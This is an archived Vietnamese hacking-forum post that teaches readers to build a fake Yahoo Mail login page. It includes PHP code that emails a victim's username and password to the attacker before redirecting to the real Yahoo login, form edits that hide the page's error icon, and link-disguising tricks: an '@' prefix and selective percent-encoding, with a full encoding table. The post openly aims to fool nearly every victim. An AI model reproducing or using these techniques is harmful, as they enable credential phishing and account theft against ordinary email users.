PDA

View Full Version : Buồn nên Fake Yahoo chơi !



boymc
18-05-05, 11:38 PM
Bước 1. Tạo Fake login: Muốn lấy được pass của victim với tỉ lệ thành công cao, bạn phải có một trang Web dỏm y hệt như của Yahoo! Mail

Thuổng của người khác:

QUOTE
Tạo tệp yahoo.PHP, đoạn code như sau:

<?
&#036;contactemail = "mailcuaban@yahoo.com"; //
&#036;subject = "password of &#036;login@yahoo.com : &#036;passwd";
&#036;message = "";
mail(&#036;contactemail, &#036;subject, &#036;message);
header("location: http://login.yahoo.com/config/login?6rfn98...&.src=ym&.last= &promo=&.intltype=us&.bypass=&.partner=&.u=6l335nstlpk8v&.v=0&hasMsgr= 0&.chkP=Y&.done=&login=&#036;login&passwd=&#036;passwd&.persistent=");
?>

Save as trang chính của yahoo&#33; mail, sau đó mở tệp này bằng Notepate và tìm đến dòng:

<FORM name=login_form onsubmit="return hash(this,&#39;http://login.yahoo.com/config/login&#39;)" action=http://login.yahoo.com/config/login method=post autocomplete="off">

Thay đoạn này bằng :

<FORM action="http://trang Web có hỗ trợ php/tên đăng kí của bạn/yahoo.php" method="post">


Cái này thì cực nhiều hướng dẫn trên diễn đàn rồi, nhưng có một số lỗi sau khiến hiệu quả không được cao:

1: Đoạn code sửa đổi <form> hoạt động tốt, nhưng gây lỗi trên trang Fake login, tôi không hiểu sao mấy chú trên forum quảng cáo rất nhiều về trang Fake login của mình mà không chịu sửa nó đi......
Nếu bạn để ý, làm theo hướng dẫn của bất kì bài viết nào hiện có trên diễn đàn, trang fake login cũng hiện lên 1 biểu tượng báo lỗi (có dấu &#33; màu vàng) ở Status bar, nếu victim tinh ý 1 tí là nhận ra ngay, không cần nhìn lên đường link làm gì cả

Cách sửa: Thực ra cũng chẳng có gì đáng nói, các chú tiết kiệm quá nên bỏ qua mấy khai báo đơn giản:

Chỉ cần sửa như sau:

<FORM name=login_form action="http://trang Web có hỗ trợ php/tên đăng kí của bạn/yahoo.php" method="post" autocomplete="off">

Ổn rồi phải không, thành công 1 bước nhỏ trong việc che mắt victim........

2. Nhìn cái đường link của mấy chú thấy chán cả người, ai lại giao diện của Yahoo&#33; Mail mà tên đường dẫn lại cực chuối củ...... No problem, thực tế thì chẳng ai đăng kí được 1 cái domain giông giống như mail.yahoo.com cả...... Cách khắc phục đây:

Cái này thuổng của người khác:

QUOTE
Nếu trước đường link, ta thêm "@", rồi oánh lia lịa các kí tự vớ vỉn, thì IE cũng chỉ công nhận các kí tự ở đằng sau "@" mà thôi


1 ý tưởng hay, do đó, bạn có thể thêm www.mail.yahoo@ vào đằng trước đường link của bạn,
VD: http://www.mail.yahoo@trang Web có hỗ trợ php/tên đăng kí của bạn

hehhe, thường là victim chỉ nhìn mấy cái chữ đầu của đường link mà thôi, do đó nhìn như vậy cũng tạm ổn phải không..... nếu chú nào dể tính thì uh, nhưng tôi thì không, đã làm là phải lừa không được 100% thì cũng phải 95-96% chứ, nhìn cái tên trang Web của bạn nó vẫn lù lù đằng sau kia kìa, ai mà chẳng nhận ra.....

Do đó, có 1 cách cực hay sau:

Mã hoá Url: Dùng cái này có thể mã hoá đường link của bạn thành các kí tự loằng ngoằng, khó ai dịch được (nhưng IE lại chấp nhận). điều đó sẽ khiến victim không đề phòng nổi do đường link trông hầu như hao hao với trang Yahoo&#33; Mail khi ta Sign Out

Giới thiệu qua: Forum http://www.vnhacker.org/forum khi được mã hoá sẽ như sau:

http://www.vn%68%61cke%72%2E%6Frg/f%6Fru%6D

Trông loằng ngoăng hợp lệ chưa??? Bạn thử copy đường link trên cho chạy thử xem sao???Đảm bảo dẫn đến forum..... hehheh

Và sau đây là bảng hướng dẫn mã hoá:

a ---&#62; %61 b ---&#62; %62 c ---&#62; %63 d ---&#62; %64 e ---&#62; %65
A ---&#62; %41 B ---&#62; %42 C ---&#62; %43 D ---&#62; %44 E ---&#62; %45

f ---&#62; %66 g ---&#62; %67 h ---&#62; %68 i ---&#62; %69 j ---&#62; %6A
F ---&#62; %46 G ---&#62; %47 H ---&#62; %48 I ---&#62; %49 J ---&#62; %4A

k ---&#62; %6B l ---&#62; %6C m ---&#62; %6D n ---&#62; %6E o ---&#62; %6F
K ---&#62; %4B L ---&#62; %4C M ---&#62; %4D N ---&#62; %4E O ---&#62; %4F

p ---&#62; %70 q ---&#62; %71 r ---&#62; %72 s ---&#62; %73 t ---&#62; %74
P ---&#62; %50 Q ---&#62; %51 R ---&#62; %52 S ---&#62; %53 T ---&#62; %54

u ---&#62; %75 v ---&#62; %76 w ---&#62; %77 x ---&#62; %78 y ---&#62; %79
U ---&#62; %55 V ---&#62; %56 W ---&#62; %57 X ---&#62; %58 Y ---&#62; %59

z ---&#62; %7A
Z ---&#62; %5A

1 ---&#62; %31 2 ---&#62; %32 3 ---&#62; %33 4 ---&#62; %34 5 ---&#62; %35
6 ---&#62; %36 7 ---&#62; %37 8 ---&#62; %38 9 ---&#62; %39 0 ---&#62; %30
. ---&#62; %2E

Okie, được rồi đó, lưu ý như sau: đường link nào dù loằng ngoằng đến đâu thì cũng vẫn có các chữ và con số, do đó bạn không nên mã hoá tất cả, mà chỉ mã hoá 1 số từ nhạy cảm, ví dụ www11.brinkster.com chẳng hạn, để victim không nhận ra là brinkster, bạn mã hoá một số từ thôi:

w%77w1%31.br%69ks%74er%2Ecom

hehhe, hợp lý chứ.......